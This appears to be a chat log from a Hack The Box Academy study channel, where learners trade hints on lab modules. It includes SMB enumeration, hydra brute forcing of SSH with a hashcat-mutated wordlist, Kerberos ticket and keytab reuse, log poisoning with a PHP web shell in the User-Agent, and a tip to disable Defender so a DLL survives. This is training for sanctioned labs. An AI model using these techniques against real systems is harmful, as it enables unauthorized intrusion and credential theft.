bro go for a walk and believe me you will figure out

change log

Modules >> Change log

you will see those as not completed

Thanks for your help

Ok

hello guys, I need a hint cuz I'm stuck with the Lab Hard from Password Attack module, let me give you some context what I did so far, I found (brute forced) the password from the user name in the question exercise, with this credential I tried to enumerate SMB : smbclient -L //server -U user obtaining a completely different Path as I got when connect with xfreerdp , this on the one hand.

On the other hand, (once connected to the Win Machine) I found a file which I tried to download it in my attacker machine thru : sudo smbserver.py folder -smb2support /tmp/smbshare getting an authentication error once try to share the file, then I did the same with username & password and, everything was great BUT, the file wasn't shared/downloaded/pasted in my attacker machine, once again I received an error, in this time, the error more or less described the file name was not found and, I'm spelling the file name as is in the windows folder.

Any hint, clue what could be happening or what I'm doing wrong or misunderstanding?

Smb is not gonna give you the same thing because smb works off shared folders

But also

If you do /drive: you can mount a directory to your xfreerdp session

Footprinting?

#modules message

Almost like I've answered this before

Without context of where you're stuck or what you've tried it's hard to help

Next time include that in your initial ask

It's just how imap is

You should probably select something

Well it looks like nothing is in inbox, but there's another folder you to try

This is great. Killer share mate. @rustic sage If you give those a good read that should fill any gaps not covered explicitly in the module. 👍

Note if you didn't delete your screenshot, mod probably did bc spoiler

It's alright go share, just keep in mind you may need to edit out things that may reveal answers

Well did you see '1 exists' after selecting it?

Then all you need to do is fetch it's body[]

You can do the fetch all command too if you wanna see why I don't recommend it

The command is <prefix> fetch <id> <type>

But nothing is needed in the square brackets

That's only if you're trying to be more specific (see the articles I linked)

If there's only 1 email why are you trying to select the second non-existent one

cough

More specifically the <id> is the sequential list

Eh

The easier way is using an email client

I mean it helps get you banners to answer a couple questions

It's also familiarity

You're used to GUI applications

So terminal seems tedious

But also if you don't know what you're doing: it's rougher bc you can't just click around and find out

root

toor

toor

Hello. I am working through the Footprinting Module and running into an issue on the DNS section with the first question:
"Interact with the Target DNS using its IP address and enumerate the FQDN of it for the inlanefreight.htb domain"
I have added the generated IP and domain to the /etc/hosts file but when I try to run
"dig ns inlanefreight.htb@(Generated IP)"
I always recieve a NXDOMAIN status
I even tried nslookup and it gave me the same error
Would really appreciate some help
Thank you

Are you connected to the VPN? Also, be sure to format any commands you are entering as code by wrapping them in single or triple-backticks to make it easier to see what you are attempting.

I am using the pwnbox and thank you I will make sure to do that

There should be a space between the domain name and the @[Target IP].

agh im dumb lol thank you so much for that

You are not dumb. You are learning, just like we all are.

I appreciate the help

i cant believe i made it here with constant dedication, now is only the hard modules left. I had no idea how long this would take and how much effort is required.

yes eventually

ive been trying to finish all the modules first then tryhard in the boxes, as a refresher and practice before the exam in like 3 months.

im not sure its best option but at least its something, and there are like zero CTFs in my area.

i have 0 background in the field and this is my first cert

so just learning the maximum to not get confused works best for me

Hello I need help for skill assessment 2
Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.
I got the credentials but I dont know ||how I change the admin password||

which module

try powerview

always CTFs going on online, still fun to do even if you're not playing to win

AD Enumeration & Attacks

i just need to find people to team up with.

Try || Add-DomainGroupMember ||

can anyone help me with Password Attacks > Pass the ticket from linux module with this question? Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.

i found the AES256 hash, but i don't found NTLM

@latent sigil can I DM you ?

sure

The instructions in the module are almost exactly what you have to do, just make sure to take a closer look at where on the file system you find that AES256

i found the aes256 with this .kt

I said what I said

good enumeration practice

the question says to look in the cronjobs, that's where I looked

😢

can you help me?

You have found a spot where carlos is storing tickets. Maybe there are other tickets there?

you have sent the same screenshot twice

wow

i found it

thks

enumeration is important 🙃

maybe a stupid question about windows, but is this done by defender and is the solution killing defender or is there an other way?

Real Time Protection is responsible for this. Disable it and it will not delete your dll anymore

Did anyone have this section take a while? like over 15 min? https://academy.hackthebox.com/module/147/section/1391

Be sure to make use of the downloadable "Resources" available at the top-right corner of the page and follow the module instructions to create the mutated wordlist.

Directions are pretty straigh forward. I ran hashcat to mutate the wordlist - hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
then ran/running:
hydra -l sam -P mut_password.list ssh://$ip

Are the resources different in each section? I downloaded them in a section before. should I download again?

No, they're the same. If it looks like it might take a completely unreasonable amount of time, there is probably a better way. Enumeration is key.

Ah I see now

question: What is a good tool to make notes about networks and their connections, something to visualize it.

Wireshark?

Let me enhance the question. For the tunneling and pivoting i will start the skillassessment. It would be nice to draw out the network i discover with any credentials in a nice program, rather then drawing on my desk. is there such a program or do i fall back on powerpoint ;d

Now I know what you mean.
Check out Visio or draw.io

thanks

Could someone help me with the Pass the Ticket section, please? Particularly the last question, "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_)."

I have used linikatz and it provided me with the below

||Ticket cache: FILE:/var/lib/sss/db/ccache_INLANEFREIGHT.HTB
Default principal: LINUX01$@INLANEFREIGHT.HTB

I then I used this kinit linux01@INLANEFREIGHT.HTB -k -t /var/lib/sss/db/ccache_INLANEFREIGHT.HTB||

but doesn't work

i'm doing the password attacks

assessment

500 Internal Server Error

i have the password for all users expect admin

having issues mouting

anyone?

i'm getting this error message

Send screenshots of your process

i got this file from smb enumeration using D creds

i was told snmp is on this machine

how do you censor?

or do you think it will be ok?

anyone can help me? 😢

How did you get the flag file name ?

when I do &cmd=ls /

I did it once and it worked

but if I do the cat command it doesnt

and then nothing works

Because you are resending the webshell payload.
Send the webshell once to the logfile, then use it.

what???

ok I need to look into that thanks

restart the lab 😉

can you help me?

With what?

"Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_)." for password attacks modules

I have used linikatz and it provided me with the below

||Ticket cache: FILE:/var/lib/sss/db/ccache_INLANEFREIGHT.HTB
Default principal: LINUX01$@INLANEFREIGHT.HTB

I then I used this kinit linux01@INLANEFREIGHT.HTB -k -t /var/lib/sss/db/ccache_INLANEFREIGHT.HTB||
but doesn't work

Let me check my notes

it didnt work

You used the wrong Ticket

hmmmmmm

in the notes I found this

Where am I going wrong?
First thing I do is refresh the access.log page to intercept in Burp
Then put in the PHP web shell in the User Agent
Press Forward
Then I refresh the page again to enter RCE in Burp

||Intercept the request with Burp.
Send this request twice to the repeater.
In the first tab you adjust the user agent. Send it exactly once.
In the second tab you send the cmd=... command.||

Search for keytab on the system.

I did exactly this and still unfortunately nothing

Restart the Lab and start from scratch.
One wrong character in the log and the log is broken -> Error 500

I'm confused

ok but I have tried restarting like 20 times lol

What you are looking for is visible in your print screen.

hmmmm

stil 500 Internal Server Error on the 2nd repeater tab

its BROKEN

Can someone help me use the matplotib module?

Hi any tip fixing this problem when doing RDP in File Transfer Module?

Yes

Maybe try verification again

How can I do that?

THIS IS SICK MAN

Can anyone help me with the plot?

I need to put a pic

now I use kinit?

oh my GOD I forgot ONE apostrophe?????

https://tenor.com/view/diagnosis-skill-diagnosis-skill-gif-22906457

Yes

my head is bursting with pain right here lol

this module is so confuse

Send me a DM to not spoil here

ok

I spent hours on that one single apostrophe missing

I cant believe this

😭

I was trying to make an graphical program output but it did not work @elfin cedar can I dm you an example?

hi someone can help me with this question ? Some PowerShell code has been loaded into memory that scans/targets network shares. Leverage the available PowerShell logs to identify from which popular hacking tool this code derives. Answer format (one word): P____V___

in https://academy.hackthebox.com/module/214/section/2285 Hunting For Stuxbot ?

https://www.elastic.co/guide/en/security/current/powershell-suspicious-discovery-related-windows-api-functions.html

and this one

https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-0-16-2-powershell-suspicious-discovery-related-windows-api-functions.html

man that wore me out

ty for the help

thanks, and if i have understand i have to search in script block after execution of query for a word starting by P and contains V like P * V * ?

No, P....V.... is the tool.
But if you look at the script block, you will find commands that were used. If you don't know the tool, then search the internet for this command. This will lead you to the tool you are looking for.

Oh ok thanks !!

Hint: ||There is even a module about this tool in the Academy||

yes i found it thanks again!

I see we’re all having fun with Kerberos tickets today.

Gotta love the learning process!

you've got the password wrong i think

or u can try escaping the excalamation mark

Guess I don't get. I tried CME, hydra and used the base64.rule i hashcat but I can't any of the tools to finish getting sam's password https://academy.hackthebox.com/module/147/section/1391

ha nm - #modules message

hey guys, can I think in the Module Password Attack under Lab Hard, the file sharing features is not allowed in the target machine?

I cannot share a folder with xfreerdp and remmina even

can you enabled an smb share on kali?

or spin up a python3 -m http.server 80?

I'm not using kali

doesn't matter

can you spin up an smb share with impacket-smb?

yup but, when I try to copy a file from Windows (target) to my attacker machine I got an error message

try this attack machine python3 -m http.server

So the xfreerdp /drive: option doesn't work?

or this,,,

Hmm

unfortunately not

one sec I have a resource

Idk I didn't have issues when I ran it

¯_(ツ)_/¯

So I'm not gonna be of help troubleshooting

Could just need a lab reset to try again

that's why I'm thinking maybe the feature is not allowed in the target

Usually wait a few minutes

Fileshare is allowed

And drive mounting is absolutely available

from attack sudo impacket-smbserver share . -smb2support -username saul -password goodman

hmm ok., so I'm not sure what it's happening

You're probably doing something incorrectly

then on windows \\AttackmachineIP\share

ok., let me share the error message

one sec